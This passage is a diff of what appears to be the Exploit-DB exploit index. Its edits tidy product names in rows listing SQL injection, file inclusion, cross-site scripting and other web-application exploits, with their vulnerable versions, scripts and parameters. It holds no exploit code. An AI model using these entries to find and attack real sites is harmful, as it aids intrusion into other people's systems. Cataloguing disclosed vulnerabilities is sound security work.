18561,platforms/php/webapps/18561.txt,"lizard cart - 'search.php' SQL Injection",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"Fork CMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 -18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 +18506,platforms/php/webapps/18506.txt,"Brim < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 18508,platforms/php/webapps/18508.txt,"LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,hardware,webapps,0 @@ -25702,7 +25704,7 @@ id,file,description,date,author,platform,type,port 21208,platforms/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 -21221,platforms/php/webapps/21221.txt,"Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 +21221,platforms/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0 21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps,0 21233,platforms/php/webapps/21233.txt,"PHP-Nuke 4.x/5.x - SQL_Debug Information Disclosure",2002-01-18,zataz.com,php,webapps,0 @@ -25995,7 +25997,7 @@ id,file,description,date,author,platform,type,port 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0 22152,platforms/php/webapps/22152.txt,"Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection",2012-10-22,D4NB4R,php,webapps,0 22153,platforms/php/webapps/22153.pl,"Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 -22156,platforms/php/webapps/22156.txt,"Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 +22156,platforms/php/webapps/22156.txt,"WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection",2012-10-22,Cumi,php,webapps,0 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 @@ -26225,7 +26227,7 @@ id,file,description,date,author,platform,type,port 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 - VDS Control Panel Account Configuration Modification",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22829,platforms/php/webapps/22829.txt,"webid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 +22829,platforms/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - user.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question Parameter' SQL Injection",2012-11-16,unsuprise,php,webapps,0 @@ -26483,7 +26485,7 @@ id,file,description,date,author,platform,type,port 23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - 'index.php' Page Parameter Cross-Site Scripting",2003-12-27,"David S. Ferreira",php,webapps,0 23487,platforms/php/webapps/23487.txt,"PHP-ping - Count Parameter Command Execution",2003-12-29,ppp-design,php,webapps,0 23488,platforms/cgi/webapps/23488.txt,"BulletScript MailList - bsml.pl Information Disclosure",2003-12-29,M0rf,cgi,webapps,0 -23494,platforms/php/webapps/23494.txt,"Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0 +23494,platforms/php/webapps/23494.txt,"WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0 23498,platforms/hardware/webapps/23498.txt,"SonicWALL SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 @@ -27340,7 +27342,7 @@ id,file,description,date,author,platform,type,port 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps,0 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0 25248,platforms/php/webapps/25248.txt,"Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps,0 -25249,platforms/php/webapps/25249.txt,"Webid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps,0 +25249,platforms/php/webapps/25249.txt,"WeBid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps,0 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,php,webapps,0 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 @@ -28016,10 +28018,10 @@ id,file,description,date,author,platform,type,port 26143,platforms/php/webapps/26143.txt,"ezUpload 2.2 - form.php path Parameter Remote File Inclusion",2005-08-10,"Johnnie Walker",php,webapps,0 26144,platforms/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php' mid Parameter SQL Injection",2005-08-10,abducter_minds@yahoo.com,php,webapps,0 26146,platforms/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 - 'index.php' Cross-Site Scripting",2005-08-10,dyn0,php,webapps,0 -26147,platforms/php/webapps/26147.txt,"MyBulletinBoard RC4 - 'Username' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26148,platforms/php/webapps/26148.txt,"MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26149,platforms/php/webapps/26149.txt,"MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26150,platforms/php/webapps/26150.txt,"MyBulletinBoard RC4 - 'action' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 +26147,platforms/php/webapps/26147.txt,"MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 +26148,platforms/php/webapps/26148.txt,"MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 +26149,platforms/php/webapps/26149.txt,"MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 +26150,platforms/php/webapps/26150.txt,"MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.asp SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",php,webapps,0 @@ -28077,7 +28079,7 @@ id,file,description,date,author,platform,type,port 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - Description Field HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps,0 26225,platforms/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,php,webapps,0 26226,platforms/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,php,webapps,0 -26228,platforms/php/webapps/26228.txt,"MyBulletinBoard 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,php,webapps,0 +26228,platforms/php/webapps/26228.txt,"MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,php,webapps,0 26229,platforms/php/webapps/26229.txt,"phpCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,php,webapps,0 26231,platforms/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - SetCookie.php Directory Traversal",2005-09-07,rgod,php,webapps,0 26232,platforms/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,php,webapps,0 @@ -28090,7 +28092,7 @@ id,file,description,date,author,platform,type,port 26243,platforms/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 26244,platforms/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",php,webapps,0 26246,platforms/php/webapps/26246.txt,"Simple File Manager 024 - Login Bypass",2013-06-17,Chako,php,webapps,0 -26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,php,webapps,0 +26247,platforms/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,php,webapps,0 40300,platforms/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",php,webapps,80 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,php,webapps,0 26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 @@ -28193,7 +28195,7 @@ id,file,description,date,author,platform,type,port 26393,platforms/php/webapps/26393.txt,"phpMyAdmin 2.x - server_databases.php Cross-Site Scripting",2005-05-20,"Tobias Klein",php,webapps,0 26394,platforms/php/webapps/26394.txt,"MWChat 6.8 - chat.php SQL Injection",2005-05-21,rgod,php,webapps,0 26395,platforms/php/webapps/26395.txt,"Basic Analysis and Security Engine (BASE) 1.2 - Base_qry_main.php SQL Injection",2005-10-25,"Remco Verhoef",php,webapps,0 -26396,platforms/php/webapps/26396.pl,"MyBulletinBoard 1.0 - 'usercp.php' SQL Injection",2005-10-26,Animal,php,webapps,0 +26396,platforms/php/webapps/26396.pl,"MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection",2005-10-26,Animal,php,webapps,0 26397,platforms/php/webapps/26397.txt,"IPBProArcade 2.5.2 - GameID Parameter SQL Injection",2005-10-26,almaster,php,webapps,0 26398,platforms/cgi/webapps/26398.txt,"RSA ACE Agent 5.x - Image Cross-Site Scripting",2005-10-26,"Bernhard Mueller",cgi,webapps,0 26399,platforms/php/webapps/26399.txt,"Belchior Foundry VCard 2.9 - Remote File Inclusion",2005-10-26,X,php,webapps,0 @@ -29085,7 +29087,7 @@ id,file,description,date,author,platform,type,port 27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 - '.BVF' File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps,0 27525,platforms/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 27531,platforms/php/webapps/27531.txt,"WordPress Plugin Hms Testimonials 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 -27532,platforms/php/webapps/27532.txt,"Joomla! Component 'com_redshop' 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 +27532,platforms/php/webapps/27532.txt,"Joomla! Component redSHOP 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - searchresults.asp Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 @@ -29477,7 +29479,7 @@ id,file,description,date,author,platform,type,port 28089,platforms/php/webapps/28089.txt,"Woltlab Burning Board 1.2/2.0/2.3 - newthread.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 -28092,platforms/php/webapps/28092.txt,"MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0 +28092,platforms/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0 28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 @@ -29605,7 +29607,7 @@ id,file,description,date,author,platform,type,port 28282,platforms/php/webapps/28282.txt,"phpBB-Auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28289,platforms/php/webapps/28289.txt,"Bosdates 3.x/4.0 - Payment.php Remote File Inclusion",2006-07-27,admin@jaascois.com,php,webapps,0 -28291,platforms/php/webapps/28291.txt,"MyBulletinBoard 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 +28291,platforms/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",php,webapps,0 28292,platforms/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",php,webapps,0 28294,platforms/php/webapps/28294.txt,"PHP-Nuke - INP modules.php Cross-Site Scripting",2006-07-28,l2odon,php,webapps,0 28295,platforms/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - wp-comments-post.php Remote File Inclusion",2006-07-28,Drago84,php,webapps,0 @@ -29841,28 +29843,28 @@ id,file,description,date,author,platform,type,port 28614,platforms/php/webapps/28614.txt,"RedBLoG 0.5 - admin/index.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28615,platforms/asp/webapps/28615.txt,"DotNetNuke 4.0 - HTML Injection",2006-09-17,"Secure Shapes",asp,webapps,0 28616,platforms/php/webapps/28616.txt,"A.I-Pifou 1.8 - Choix_langue.php Directory Traversal",2006-09-20,cdg393,php,webapps,0 -28617,platforms/php/webapps/28617.txt,"Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28618,platforms/php/webapps/28618.txt,"Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28619,platforms/php/webapps/28619.txt,"Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28620,platforms/php/webapps/28620.txt,"Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28621,platforms/php/webapps/28621.txt,"Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28622,platforms/php/webapps/28622.txt,"Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28623,platforms/php/webapps/28623.txt,"Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28624,platforms/php/webapps/28624.txt,"Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28625,platforms/php/webapps/28625.txt,"Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28626,platforms/php/webapps/28626.txt,"Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28627,platforms/php/webapps/28627.txt,"Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28628,platforms/php/webapps/28628.txt,"Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28629,platforms/php/webapps/28629.txt,"Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28630,platforms/php/webapps/28630.txt,"Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28631,platforms/php/webapps/28631.txt,"Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28632,platforms/php/webapps/28632.txt,"Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28633,platforms/php/webapps/28633.txt,"Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28634,platforms/php/webapps/28634.txt,"Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28635,platforms/php/webapps/28635.txt,"Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28636,platforms/php/webapps/28636.txt,"Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 -28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28617,platforms/php/webapps/28617.txt,"BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28618,platforms/php/webapps/28618.txt,"BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28619,platforms/php/webapps/28619.txt,"BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28620,platforms/php/webapps/28620.txt,"BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28621,platforms/php/webapps/28621.txt,"BandSite CMS 1.1 - 'header.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28622,platforms/php/webapps/28622.txt,"BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28623,platforms/php/webapps/28623.txt,"BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28624,platforms/php/webapps/28624.txt,"BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28625,platforms/php/webapps/28625.txt,"BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28626,platforms/php/webapps/28626.txt,"BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28627,platforms/php/webapps/28627.txt,"BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28628,platforms/php/webapps/28628.txt,"BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28629,platforms/php/webapps/28629.txt,"BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28630,platforms/php/webapps/28630.txt,"BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28631,platforms/php/webapps/28631.txt,"BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28632,platforms/php/webapps/28632.txt,"BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28633,platforms/php/webapps/28633.txt,"BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28634,platforms/php/webapps/28634.txt,"BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28635,platforms/php/webapps/28635.txt,"BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28636,platforms/php/webapps/28636.txt,"BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28637,platforms/php/webapps/28637.txt,"BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 +28638,platforms/php/webapps/28638.txt,"BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 @@ -30155,7 +30157,7 @@ id,file,description,date,author,platform,type,port 29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29018,platforms/php/webapps/29018.txt,"Plesk 7.5/8.0 - login_up.php3 Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 29019,platforms/php/webapps/29019.txt,"Zikula CMS 1.3.5 - Multiple Vulnerabilities",2013-10-17,Vulnerability-Lab,php,webapps,0 -29020,platforms/php/webapps/29020.txt,"Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 +29020,platforms/php/webapps/29020.txt,"WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting",2013-10-17,Zy0d0x,php,webapps,80 29021,platforms/php/webapps/29021.txt,"WordPress Plugin Realty - Blind SQL Injection",2013-10-17,Napsterakos,php,webapps,80 29023,platforms/php/webapps/29023.txt,"Woltlab Burning Board Regenbogenwiese 2007 Addon - SQL Injection",2013-10-17,"Easy Laster",php,webapps,0 29024,platforms/asp/webapps/29024.txt,"Inventory Manager - Multiple Input Validation Vulnerabilities",2006-11-14,"laurent gaffie",asp,webapps,0 @@ -30269,7 +30271,7 @@ id,file,description,date,author,platform,type,port 29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 -29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 +29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - Item_Show.asp ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - Listpics.asp SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 @@ -30509,7 +30511,7 @@ id,file,description,date,author,platform,type,port 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 -30050,platforms/php/webapps/30050.html,"Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 +30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0 @@ -30828,12 +30830,12 @@ id,file,description,date,author,platform,type,port 29905,platforms/php/webapps/29905.txt,"CafeLog B2 0.6.1 Weblog and News Publishing Tool - b2categories.php b2inc Parameter Remote File Inclusion",2006-04-25,alijsb,php,webapps,0 29906,platforms/php/webapps/29906.txt,"CafeLog B2 0.6.1 Weblog and News Publishing 